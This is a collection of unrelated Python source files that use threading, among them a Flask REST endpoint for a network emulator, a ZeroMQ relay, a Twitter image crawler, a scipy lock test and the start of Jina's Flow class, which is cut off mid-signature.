LOG.debug("Downloading file range %s:%s success" % (start, end))
with _LOCK:
self.fd.seek(start)
self.fd.write(res.content)
@handle_download_errors
def run(self):
        self.fd = open(self.target, 'wb')
thread_list = []
n = 0
for ran in self.get_range():
start, end = ran
LOG.debug('thread %d start:%s,end:%s' % (n, start, end))
n += 1
# Open thread
thread = threading.Thread(target=self.download, args=(start, end))
thread.start()
thread_list.append(thread)
for i in thread_list:
i.join()
        LOG.info('Download %s succeeded' % (self.name))
self.fd.close()
|
rest_api_endpoint.py
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import threading
from flask import Flask, send_from_directory
from flask_restful import Api
from gevent.pywsgi import WSGIServer
# need to import total module to set its global variable dcs
from emuvim.api.rest import compute
from emuvim.api.rest.compute import ComputeList, Compute, ComputeResources, DatacenterList, DatacenterStatus
# need to import total module to set its global variable net
from emuvim.api.rest import network
from emuvim.api.rest.network import NetworkAction, DrawD3jsgraph
from emuvim.api.rest import monitor
from emuvim.api.rest.monitor import MonitorInterfaceAction, MonitorFlowAction, MonitorLinkAction, MonitorSkewAction, MonitorTerminal
import pkg_resources
from os import path
logging.basicConfig()
class RestApiEndpoint(object):
"""
Simple API endpoint that offers a REST
interface. This interface will be used by the
default command line client.
"""
def __init__(self, listenip, port, DCnetwork=None):
self.ip = listenip
self.port = port
# connect this DC network to the rest api endpoint (needed for the
# networking and monitoring api)
self.connectDCNetwork(DCnetwork)
# setup Flask
self.app = Flask(__name__)
self.api = Api(self.app)
# define dashboard endpoints
db_dir, db_file = self.get_dashboard_path()
@self.app.route('/dashboard/<path:path>')
def db_file(path):
logging.info("[DB] Serving: {}".format(path))
return send_from_directory(db_dir, path)
# define REST API endpoints
# compute related actions (start/stop VNFs, get info)
self.api.add_resource(
Compute, "/restapi/compute/<dc_label>/<compute_name>")
self.api.add_resource(ComputeList,
"/restapi/compute",
"/restapi/compute/<dc_label>")
self.api.add_resource(
ComputeResources, "/restapi/compute/resources/<dc_label>/<compute_name>")
self.api.add_resource(
DatacenterStatus, "/restapi/datacenter/<dc_label>")
self.api.add_resource(DatacenterList, "/restapi/datacenter")
# network related actions (setup chaining between VNFs)
self.api.add_resource(NetworkAction,
"/restapi/network")
self.api.add_resource(DrawD3jsgraph,
"/restapi/network/d3jsgraph")
# monitoring related actions
# export a network interface traffic rate counter
self.api.add_resource(MonitorInterfaceAction,
"/restapi/monitor/interface")
# export flow traffic counter, of a manually pre-installed flow entry,
# specified by its cookie
self.api.add_resource(MonitorFlowAction,
"/restapi/monitor/flow")
# install monitoring of a specific flow on a pre-existing link in the service.
# the traffic counters of the newly installed monitor flow are exported
self.api.add_resource(MonitorLinkAction,
"/restapi/monitor/link")
        # install skewness monitor of resource usage distribution
# the skewness metric is exported
self.api.add_resource(MonitorSkewAction,
"/restapi/monitor/skewness")
# start a terminal window for the specified vnfs
self.api.add_resource(MonitorTerminal,
"/restapi/monitor/term")
logging.debug("Created API endpoint %s(%s:%d)" %
(self.__class__.__name__, self.ip, self.port))
def get_dashboard_path(self):
"""
Return absolute path to dashboard files.
"""
db_file = pkg_resources.resource_filename(
'emuvim.dashboard', "index.html")
db_dir = path.dirname(db_file)
logging.info("[DB] Serving emulator dashboard from: {} and {}"
.format(db_dir, db_file))
return db_dir, db_file
def connectDatacenter(self, dc):
compute.dcs[dc.label] = dc
logging.info(
"Connected DC(%s) to API endpoint %s(%s:%d)" % (dc.label, self.__class__.__name__, self.ip, self.port))
def connectDCNetwork(self, DCnetwork):
network.net = DCnetwork
monitor.net = DCnetwork
logging.info("Connected DCNetwork to API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def start(self):
self.thread = threading.Thread(target=self._start_flask, args=())
self.thread.daemon = True
self.thread.start()
logging.info("Started API endpoint @ http://%s:%d" %
(self.ip, self.port))
def stop(self):
if self.http_server:
self.http_server.close()
def _start_flask(self):
# self.app.run(self.ip, self.port, debug=False, use_reloader=False)
# this should be a more production-fit http-server
# self.app.logger.setLevel(logging.ERROR)
self.http_server = WSGIServer((self.ip, self.port),
self.app,
# This disables HTTP request logs to not
# mess up the CLI when e.g. the
# auto-updated dashboard is used
log=open("/dev/null", "w")
)
self.http_server.serve_forever()
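# Illustrative usage sketch (not part of the original module): wiring the REST
# endpoint into an emulated topology. `net` and `dc` are hypothetical
# placeholders for a DCNetwork and a datacenter created elsewhere.
#
#   api = RestApiEndpoint("0.0.0.0", 5001, DCnetwork=net)
#   api.connectDatacenter(dc)
#   api.start()   # serves the Flask/WSGI app in a daemon thread
#   ...
#   api.stop()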
|
mtrelay.py
|
"""
Multithreaded relay
Author: Guillaume Aubert (gaubert) <guillaume(dot)aubert(at)gmail(dot)com>
"""
import threading
import zmq
def step1(context):
""" step1 """
# Signal downstream to step 2
sender = context.socket(zmq.PAIR)
sender.connect("inproc://step2")
sender.send("")
def step2(context):
""" step2 """
# Bind to inproc: endpoint, then start upstream thread
receiver = context.socket(zmq.PAIR)
receiver.bind("inproc://step2")
thread = threading.Thread(target=step1, args=(context, ))
thread.start()
# Wait for signal
string = receiver.recv()
# Signal downstream to step 3
sender = context.socket(zmq.PAIR)
sender.connect("inproc://step3")
sender.send("")
return
def main():
""" server routine """
# Prepare our context and sockets
context = zmq.Context(1)
# Bind to inproc: endpoint, then start upstream thread
receiver = context.socket(zmq.PAIR)
receiver.bind("inproc://step3")
thread = threading.Thread(target=step2, args=(context, ))
thread.start()
# Wait for signal
string = receiver.recv()
print("Test successful!\n")
receiver.close()
context.term()
return
if __name__ == "__main__":
main()
|
console_coorelate.py
|
import time
import threading
import logging
import data as d
from analysis.correlate import Correlate
from data import store as store
from utils import ui
_logger = ui.get_logger(logging.WARNING, logfile='')
class Interface:
def __init__(self, coor: str = ''):
self.list = coor.upper()
self.coorelate: Correlate = None
self.exchanges = [e['abbreviation'] for e in d.EXCHANGES]
self.indexes = [i['abbreviation'] for i in d.INDEXES]
self.tickers: list[str] = []
if not coor:
self.main_menu()
elif store.is_list(self.list):
self.main_menu(selection=1)
else:
ui.print_error('Invalid list specified')
def main_menu(self, selection=0):
while True:
menu_items = {
                '1': 'Compute Correlation',
                '2': 'Best Correlation',
                '3': 'Least Correlation',
                '4': 'Ticker Correlation',
'0': 'Exit'
}
if selection == 0:
selection = ui.menu(menu_items, 'Select Operation', 0, len(menu_items)-1)
if selection == 1:
self.compute_coorelation()
elif selection == 2:
self.get_best_coorelation()
elif selection == 3:
self.get_least_coorelation()
elif selection == 4:
self.get_ticker_coorelation()
elif selection == 0:
break
selection = 0
def compute_coorelation(self, progressbar=True):
if not self.list:
self.list = self._get_list()
if self.list:
self.tickers = store.get_tickers(self.list)
self.coorelate = Correlate(self.tickers)
self.task = threading.Thread(target=self.coorelate.compute_correlation)
self.task.start()
if progressbar:
print()
self._show_progress('Progress', '')
            ui.print_message(f'Correlation Among {self.list} Symbols')
print(self.coorelate.correlation)
def get_best_coorelation(self):
        if not self.coorelate:
            ui.print_error('Run correlation first')
else:
            ui.print_message(f'Best Correlations in {self.list}')
best = self.coorelate.get_sorted_coorelations(20, True)
for item in best:
print(f'{item[0]}/{item[1]:<5}\t{item[2]:.4f}')
def get_least_coorelation(self):
        if not self.coorelate:
            ui.print_error('Run correlation first')
else:
            ui.print_message(f'Least Correlations in {self.list}')
best = self.coorelate.get_sorted_coorelations(20, False)
for item in best:
print(f'{item[0]}/{item[1]:<5}\t{item[2]:.4f}')
def get_ticker_coorelation(self):
        if not self.coorelate:
            ui.print_error('Run correlation first')
else:
ticker = ui.input_text('Enter symbol: ').upper()
if not store.is_ticker(ticker):
ui.print_error('Invalid symbol')
else:
df = self.coorelate.get_ticker_coorelation(ticker)
ui.print_message(f'Highest correlations to {ticker}')
for sym, val in df[-1:-11:-1].iteritems():
print(f'{sym:>5}: {val:.5f}')
ui.print_message(f'Lowest correlations to {ticker}')
for sym, val in df[:10].iteritems():
print(f'{sym:>5}: {val:.5f}')
def _get_list(self):
list = ''
menu_items = {}
for i, exchange in enumerate(self.exchanges):
menu_items[f'{i+1}'] = f'{exchange}'
        # continue numbering after the exchange entries to avoid key collisions
        for i, index in enumerate(self.indexes, i + 1):
menu_items[f'{i+1}'] = f'{index}'
menu_items['0'] = 'Cancel'
select = ui.menu(menu_items, 'Select exchange, or 0 to cancel: ', 0, i+1)
if select > 0:
list = menu_items[f'{select}']
return list
def _show_progress(self, prefix, suffix):
while not self.coorelate.task_error:
pass
if self.coorelate.task_error == 'None':
total = self.coorelate.task_total
ui.progress_bar(self.coorelate.task_completed, self.coorelate.task_total, prefix=prefix, suffix=suffix, reset=True)
            while self.task.is_alive() and self.coorelate.task_error == 'None':
time.sleep(0.20)
completed = self.coorelate.task_completed
ticker = self.coorelate.task_ticker
ui.progress_bar(completed, total, prefix=prefix, suffix=suffix, ticker=ticker)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Analysis')
parser.add_argument('-c', '--coorelate', help='Coorelate the list')
command = vars(parser.parse_args())
if command['coorelate']:
Interface(coor=command['coorelate'])
else:
Interface()
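# Illustrative sketch (not part of the original script): the same
# "run in a background thread, poll for progress" pattern used by
# compute_coorelation() above, with a hypothetical long_task object exposing
# task_completed/task_total counters.
#
#   task = threading.Thread(target=long_task.run)
#   task.start()
#   while task.is_alive():
#       ui.progress_bar(long_task.task_completed, long_task.task_total,
#                       prefix='Progress', suffix='')
#       time.sleep(0.2)
#   task.join()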
|
test__threadsafety.py
|
from __future__ import division, print_function, absolute_import
import threading
import time
import traceback
from numpy.testing import assert_
from pytest import raises as assert_raises
from scipy._lib._threadsafety import ReentrancyLock, non_reentrant, ReentrancyError
def test_parallel_threads():
# Check that ReentrancyLock serializes work in parallel threads.
#
# The test is not fully deterministic, and may succeed falsely if
# the timings go wrong.
lock = ReentrancyLock("failure")
failflag = [False]
exceptions_raised = []
def worker(k):
try:
with lock:
assert_(not failflag[0])
failflag[0] = True
time.sleep(0.1 * k)
assert_(failflag[0])
failflag[0] = False
except Exception:
exceptions_raised.append(traceback.format_exc(2))
threads = [threading.Thread(target=lambda k=k: worker(k))
for k in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
exceptions_raised = "\n".join(exceptions_raised)
assert_(not exceptions_raised, exceptions_raised)
def test_reentering():
# Check that ReentrancyLock prevents re-entering from the same thread.
@non_reentrant()
def func(x):
return func(x)
assert_raises(ReentrancyError, func, 0)
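# Illustrative sketch (not part of the original test module): how these
# primitives are typically used in library code. `_routine_lock` and
# `_do_the_actual_work` are hypothetical names.
#
#   _routine_lock = ReentrancyLock("Parallel calls to the routine are not allowed")
#
#   def call_non_threadsafe_routine(*args):
#       with _routine_lock:
#           return _do_the_actual_work(*args)
#
#   @non_reentrant()
#   def top_level_entry(x):
#       # calling top_level_entry again from inside itself raises ReentrancyError
#       return _do_the_actual_work(x)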
|
thermostat_with_json_rpc_server.py
|
#pylint: disable=wrong-import-position, invalid-name
import threading
import asyncio
import sys
import os
from pathlib import PurePath
sys.path.append(os.getcwd())
from chili_pad_with_thermostat.thermostat import Thermostat
from chili_pad_with_thermostat.temp_program import TempProgram
from chili_pad_with_thermostat.json_rpc_server import JsonRpcServer
from chili_pad_with_thermostat.thermostat_rpc_handler import ThermostatRpcHandler
temp_program = TempProgram(str(PurePath(os.getcwd(), 'data/temp_profile.yml')))
thermostat = Thermostat(temp_program=temp_program)
thermostat_rpc_handler = ThermostatRpcHandler(thermostat)
JsonRpcServer.set_rpc_handler(thermostat_rpc_handler.handle_command)
srv = threading.Thread(target=JsonRpcServer.run_server)
srv.start()
asyncio.run(thermostat.run())
|
rest_crawler.py
|
# -*- coding=utf-8 -*-
# author: Chi-zhan Zhang
# date:2019/7/27
# func: twitter spider demo
import json
import os
import shutil
import requests
import time
import threading
import datetime
from id_collection import create_api, create_user_agent
class TwitterCrawler(object):
def __init__(self, since_id=None, clean_dir=False):
# TODO: change the proxy value by your own proxy
self.proxy = ''
# TODO: change the QUERY value by your own QUERY
self.QUERY = '#Bitcoin OR #BTC'
self.result_text_dir = './temp_data'
self.picture_dir = './pictures'
self.all_result_file = os.path.join(self.result_text_dir, 'all_result.json')
self.tweets_with_picture_file = os.path.join(self.result_text_dir, 'tweets_with_picture.json')
self.updating_all_result_file = os.path.join(self.result_text_dir, 'updating_all_result.json')
self.picture_downloaded_error_file = os.path.join(self.result_text_dir, 'picture_download_error_tweets.json')
self.log_path = './log.txt'
self.MAX_TWEETS = 1000
self.COUNT_PER_QUERY = 100
self.tweet_downloaded_count = 0
self.tweet_refined_count = 0
self.api = create_api(proxy=self.proxy)
self.since_id = since_id
"""Thread setting"""
self.lock = threading.RLock()
self.MAX_THREADS = 10
self.working_threads = 0
self.finished_threads = 0
"""Dir initialization"""
if clean_dir:
self._clean_dir()
if not os.path.isdir(self.picture_dir):
os.mkdir(self.picture_dir)
if not os.path.isdir(self.result_text_dir):
os.mkdir(self.result_text_dir)
"""Update status, if since_id is not None, it is considered updating status"""
if since_id:
if os.path.isfile(self.updating_all_result_file):
os.remove(self.updating_all_result_file)
self.all_result_file = self.updating_all_result_file
def _clean_dir(self):
""" func: remove tem_data dir and picture dir"""
if os.path.isdir(self.picture_dir):
shutil.rmtree(self.picture_dir)
if os.path.isdir(self.result_text_dir):
shutil.rmtree(self.result_text_dir)
self.log_info("Successfully cleaned temp_data dir and picture dir!")
def _save_all_result(self, search_results):
""" func: save all results of one api.search()
:arg search_results is the return of api.search()
"""
with open(self.all_result_file, 'a', encoding='utf8') as f:
for i, one_tweet in enumerate(search_results):
json.dump(one_tweet._json, f, ensure_ascii=False)
f.write('\n')
self.tweet_downloaded_count += len(search_results)
self.log_info('Total downloaded {:^6d} tweets'.format(self.tweet_downloaded_count))
def _download_picture(self, url, picture_id, picture_dir):
""" func: download a picture of a tweet
arg: url is the picture link
picture_id is the tweet id
picture_dir is the dir storing all of the downloaded pictures
return: if picture is successfully downloaded, return True; else, return False
"""
proxies = {'http': self.proxy, 'https': self.proxy}
filename = os.path.join(picture_dir, str(picture_id) + url[-4:])
try:
r = requests.get(url, headers={'User-Agent': create_user_agent()}, proxies=proxies)
r.raise_for_status()
with open(filename, 'wb') as f:
f.write(r.content)
return True
        except Exception:
            self.log_info("Download picture failed: %s" % url)
return False
def _save_one_refined_tweet(self, tweet):
""" func: Save the id, full_text and picture_url of one tweet having at least one picture
:arg: tweet is the information of one tweet, a json dictionary
"""
tweet_saved_dict = {}
tweet_saved_dict['id'] = tweet['id']
tweet_saved_dict['text'] = tweet['full_text']
# type = tweet['extended_entities']['media']['type']
# if type == "video":
tweet_saved_dict['media_url'] = tweet['extended_entities']['media'][0]['media_url_https']
try:
if self._download_picture(tweet_saved_dict['media_url'], tweet_saved_dict['id'], self.picture_dir):
with self.lock:
with open(self.tweets_with_picture_file, 'a', encoding='utf8') as f:
json.dump(tweet_saved_dict, f, ensure_ascii=False)
f.write('\n')
self.tweet_refined_count += 1
self.finished_threads += 1
self.working_threads -= 1
            else:
                with self.lock:
                    with open(self.picture_downloaded_error_file, 'a', encoding='utf8') as ef:
                        json.dump(tweet_saved_dict, ef, ensure_ascii=False)
                        ef.write('\n')
                    self.finished_threads += 1
                    self.working_threads -= 1
        except Exception as e:
            self.log_info("Some error: %s" % str(e))
            with self.lock:
                self.finished_threads += 1
                self.working_threads -= 1
def _refine_results(self):
""" func: Extract all tweets having at least one picture, save their full_text and download pictures"""
self.log_info("Start extracting tweets having at least one picture...")
refined_tweets = []
if not os.path.isfile(self.all_result_file):
self.log_info("No such a file: %s" % self.all_result_file)
return
with open(self.all_result_file, 'r', encoding='utf8') as f:
for line in f.readlines():
tweet_dict = json.loads(line.rstrip())
try:
if tweet_dict['full_text']:
if tweet_dict['extended_entities']['media'][0]['media_url_https']:
refined_tweets.append(tweet_dict)
                except (KeyError, IndexError, TypeError):
pass
total_tweets = len(refined_tweets)
for tweet in refined_tweets:
if self.working_threads < self.MAX_THREADS:
t = threading.Thread(target=self._save_one_refined_tweet, args=(tweet,))
t.start()
self.working_threads += 1
self.log_info("Working threads: {:<2d} | Maximum threads: {:<2d} "
"| Finished tweets: {:<5d} | Total tweets: {:<5d}".format(
self.working_threads, self.MAX_THREADS, self.finished_threads, total_tweets))
time.sleep(0.2)
self.log_info("Successfully refined and saved %d tweets" % self.tweet_refined_count)
def log_info(self, string):
t = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
string = t + "\t" + string
with open(self.log_path, 'a', encoding='utf8') as f:
f.write(string + '\n')
print(string)
def run(self):
max_tweet_id = -1
self.log_info("Search key words: %s | Max searched tweets: %d" % (self.QUERY, self.MAX_TWEETS))
if self.since_id:
self.log_info("Start updating tweets since id: {:}...".format(self.since_id))
else:
self.log_info("Start downloading tweets...")
while self.tweet_downloaded_count < self.MAX_TWEETS:
try:
if max_tweet_id <= 0:
if not self.since_id:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
)
else:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
since_id=self.since_id,
)
else:
if not self.since_id:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
max_id=str(max_tweet_id - 1),
)
else:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
since_id=self.since_id,
max_id=str(max_tweet_id - 1),
)
if not new_tweets:
self.log_info("No more tweets found!")
break
self._save_all_result(new_tweets)
max_tweet_id = new_tweets[-1].id
earliest_tweet_time = new_tweets[-1].created_at
self.log_info("earliest_tweet_time = %s" % earliest_tweet_time)
except Exception as e:
self.log_info("Some error: " + str(e))
break
self._refine_results()
if __name__ == '__main__':
crawler = TwitterCrawler(clean_dir=True, since_id=None)
crawler.run()
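# Illustrative sketch (not part of the original script): an incremental update
# run. After a full crawl, passing since_id (the newest tweet id already on
# disk; the value below is a hypothetical placeholder) fetches only newer
# tweets into updating_all_result.json instead of re-crawling everything.
#
#   updater = TwitterCrawler(since_id=1150000000000000000, clean_dir=False)
#   updater.run()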
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.k8s import K8sPod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
          it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
        :param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
        :param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows access within the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
        :param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
          Note: `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee successful execution of the rest of the flow. If something
          goes wrong upstream, it is hard to carry the exception forward without side effects.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
        :param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
          When used in Python, one can additionally use the following values:
          - a Python dict that represents the config
          - a text file stream that has a `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
